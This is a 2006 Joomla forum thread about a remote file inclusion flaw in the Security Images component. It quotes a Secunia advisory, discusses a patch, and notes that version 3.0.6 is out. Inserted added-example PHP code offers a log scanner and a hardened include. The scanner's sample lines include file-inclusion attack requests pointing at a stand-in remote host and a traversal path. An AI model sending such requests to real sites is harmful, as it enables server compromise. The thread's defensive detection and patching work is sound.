The Joomla! Forum ™





PostPosted: Mon Jul 31, 2006 1:29 pm 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
Remote file include exploit is in the wild.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Last edited by RobS on Thu Aug 10, 2006 8:17 pm, edited 1 time in total.

PostPosted: Mon Jul 31, 2006 2:15 pm 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
More specifics???


PostPosted: Mon Jul 31, 2006 2:47 pm 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the project's developers, sorry :(

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


PostPosted: Mon Jul 31, 2006 4:28 pm 
Joomla! Explorer

Joined: Thu Aug 18, 2005 10:40 pm
Posts: 466
Location: las vegas USA
TITLE:
Joomla Security Images Component File Inclusion

SECUNIA ADVISORY ID:
SA21260

VERIFY ADVISORY:
http://secunia.com/advisories/21260/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Security Images 3.x (component for Joomla)
http://secunia.com/product/11186/

DESCRIPTION:
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter is not
properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.

Affected files:
administrator/components/com_securityimages/configinsert.php
administrator/components/com_securityimages/lang.php

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 3.0.5. Other
versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

PROVIDED AND/OR DISCOVERED BY:
Drago84

ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2083

----------------------------------------------------------------------

_________________
joomla 1.6 Turkish support site http://www.joomlaturk.net/
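The advisory quoted above is a detection opportunity as much as a patching task: the attack it describes is a plain GET against one of the two listed files with mosConfig_absolute_path set in the query string, which is something the application never sends to itself and which therefore shows up in the web-server access log. The following PHP CLI script is an added example, not part of this thread or of the Security Images component; it scans Apache combined-format log lines and classifies any request that sets that parameter. The log lines, addresses and host names are constructed samples.

```php
<?php
// Added example, not from the thread or the Security Images component.
// Scans Apache combined-format access log lines for requests that set
// mosConfig_absolute_path, the register_globals variable the SA21260
// file-inclusion issue relies on, and classifies how the value looks.

/** Return the query-string parameters of a request target as name => value. */
function extractQueryParams(string $target): array
{
    $pos = strpos($target, '?');
    if ($pos === false) {
        return [];
    }
    // parse_str URL-decodes the values, so a %00 in the log becomes a real NUL byte here.
    parse_str(substr($target, $pos + 1), $params);
    return $params;
}

/** Classify a mosConfig_absolute_path value: 'remote', 'traversal' or 'local'. */
function classifyPathValue(string $value): string
{
    // A scheme prefix (http://, https://, ftp://, php://, data:) means include()
    // would fetch through a stream wrapper instead of reading under the site root.
    if (preg_match('#^\s*[a-z][a-z0-9+.\-]*:#i', $value) === 1) {
        return 'remote';
    }
    // Directory traversal or an embedded NUL byte points at a local-file include.
    if (strpos($value, '..') !== false || strpos($value, "\0") !== false) {
        return 'traversal';
    }
    // Even a plain local path is abnormal: no legitimate client sends this parameter.
    return 'local';
}

/** Return one record per log line that carries mosConfig_absolute_path in its query. */
function findInclusionAttempts(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        // client ident user [time] "METHOD target PROTO" status bytes ...
        if (preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m) !== 1) {
            continue;
        }
        foreach (extractQueryParams($m[4]) as $name => $value) {
            // With register_globals on, every query parameter becomes a PHP variable,
            // so the exact name from the advisory is what matters (compared case-insensitively).
            if (strcasecmp((string) $name, 'mosConfig_absolute_path') === 0 && is_string($value)) {
                $hits[] = [
                    'client' => $m[1],
                    'time'   => $m[2],
                    'target' => $m[4],
                    'kind'   => classifyPathValue($value),
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample lines (documentation-range addresses, example.* hosts).
$sampleLog = [
    '203.0.113.5 - - [31/Jul/2006:13:40:02 +0000] "GET /index.php?option=com_akobook HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [31/Jul/2006:13:41:17 +0000] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://evil.example/x.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [31/Jul/2006:13:41:19 +0000] "GET /administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=../../../../../tmp/a%00 HTTP/1.0" 500 0 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [31/Jul/2006:13:42:00 +0000] "GET /index.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
];

// Expected: the first line is silent, the other three are reported as remote, traversal and local.
foreach (findInclusionAttempts($sampleLog) as $hit) {
    printf("[%s] %s %s %s\n", $hit['kind'], $hit['time'], $hit['client'], $hit['target']);
}
```

Run it with `php scan.php` against a real log by replacing the `$sampleLog` array with `file('/path/to/access_log', FILE_IGNORE_NEW_LINES)`. A 200 response on one of the 'remote' hits is the line to investigate first, since it means the include succeeded rather than failed; the advisory's own mitigation, register_globals Off, turns every one of these into a harmless request.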


PostPosted: Tue Aug 01, 2006 6:09 am 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
Thanks all for the info... added to the official list.

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


PostPosted: Tue Aug 01, 2006 6:26 pm 
Joomla! Apprentice

Joined: Thu Nov 03, 2005 4:46 pm
Posts: 48
It seems to me that anyone who understands PHP could easily patch Security Images.

Only 2 files are listed as liabilities.

And the fix suggested in this forum is to harden the call to
Code:
require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php");
by defining the absolute path:
Code:
// dirname(__FILE__) is the directory of the script itself, so a request cannot change it
define( 'YOURBASEPATH', dirname(__FILE__) );
require_once( YOURBASEPATH . '/file_to_include.php' );


Unfortunately, I don't know PHP well enough to apply this.

Anyone?
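The post above asks how the define() pattern is actually applied. Here is an added example, not the component's own source, of what the top of one of the two affected files could look like after the change; it assumes the vulnerable require_once sits in configinsert.php, in the same directory as lang.php (the two file names come from the advisory; the layout is an assumption). It also adds the standard Joomla 1.0.x direct-access guard, which the thread does not mention but which closes the other half of the problem: the files being reachable by URL at all.

```php
<?php
// Added example, not the component's own code. Shows the fix pattern from the
// post above applied to configinsert.php (assumed to hold the vulnerable line).
//
// Before: with register_globals=On, a request can supply ?mosConfig_absolute_path=...
// and this line includes whatever that value points at, local path or remote URL:
//
//   require_once($mosConfig_absolute_path . "/administrator/components/com_securityimages/lang.php");
//
// After: two changes, neither of which depends on a request-supplied variable.

// 1. Refuse direct requests to this file. Joomla 1.0.x defines _VALID_MOS when a file
//    is loaded through index.php, so a URL aimed straight at configinsert.php or
//    lang.php stops here before any include runs.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// 2. Build the include path from this file's own location on disk.
//    dirname(__FILE__) is .../administrator/components/com_securityimages for a file
//    in that directory, so lang.php sits right beside it and no site-root prefix is needed.
if (!defined('YOURBASEPATH')) {
    define('YOURBASEPATH', dirname(__FILE__));
}
require_once(YOURBASEPATH . '/lang.php');

// The rest of the original file follows unchanged.
```

Two notes on the design. The guard alone would already stop the attack the advisory describes, because the include is never reached on a direct request; the define() change matters because it also protects against the variable being overridden on an otherwise legitimate code path. And neither replaces the advisory's instruction to set register_globals to Off, which removes the root cause for every extension on the site rather than for this one file.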


PostPosted: Tue Aug 01, 2006 8:50 pm 
Joomla! Master

Joined: Thu Aug 18, 2005 7:13 am
Posts: 16539
Version 3.06 has been brought out: http://forge.joomla.org/sf/projects/com_securityimages.

_________________
Joomla forum global moderator.

Have fun


PostPosted: Tue Aug 01, 2006 10:14 pm 
Joomla! Apprentice

Joined: Sun Jan 29, 2006 7:49 pm
Posts: 14
Location: Machynlleth, Mid-Wales, UK
Wish I could get the new one to work :(

Using 3.0.6 and the latest Akobook version, but it just refuses to work.

I can only get the freecap plugin to appear - the other two just don't do anything - and even though it appears to work, when you submit the guestbook entry, having put the security word in, it doesn't work.

I thought that I was being dumb and that I hadn't realised it was case sensitive - but either I'm blind, or it really doesn't want to know.

I did wonder whether it was the hardening of the latest Joomla, but I'm not sure.

If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk

I really feel like never updating any component or Joomla itself again as something always goes wrong hehe

/rant ;)

Cheers
Nath.

_________________
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net


PostPosted: Wed Aug 02, 2006 1:44 am 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
Nath - make sure you report this on the bug tracker on the forge's project pages.
Project devs do see these reports but may miss seeing forum posts.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


PostPosted: Wed Aug 02, 2006 5:31 pm 
Joomla! Apprentice

Joined: Sun Jan 29, 2006 7:49 pm
Posts: 14
Location: Machynlleth, Mid-Wales, UK
Hi there

I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html

Can't seem to find the SF for the project hehe. Maybe it's me being dumb or something today lol

Cheers
Nath.

_________________
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net


PostPosted: Wed Aug 02, 2006 10:44 pm 
Joomla! Explorer

Joined: Fri Aug 26, 2005 10:13 pm
Posts: 410
Location: Spain
tarquel wrote:
Hi there

I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html

Can't seem to find the SF for the project hehe. Maybe it's me being dumb or something today lol

Cheers
Nath.


Hi Nath,

From Walter Cedric's wiki you are referred to http://developer.joomla.org/sf/sfmain/d ... rityimages.
So that's the place to go!  :)

_________________
My Extensions: JM-Recommend, JM-Credits, JM-Link Us (for J! 1.0.x). Find them in the 3rd Party Extensions Forum.
Joomla test installation: www.poraqui.net/joomla  User: test  Password: test


PostPosted: Wed Aug 02, 2006 11:26 pm 
Joomla! Apprentice

Joined: Sun Jan 29, 2006 7:49 pm
Posts: 14
Location: Machynlleth, Mid-Wales, UK
ahhhhh, that's the one :)

Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps]

Cheers
Nath.

_________________
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net


PostPosted: Thu Dec 20, 2007 4:36 pm 
I've been banned!

Joined: Wed Dec 19, 2007 10:36 pm
Posts: 21
Elpie wrote:
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use.  I can only share that information with the projects developers, sorry :(


tell me more.

_________________
smile

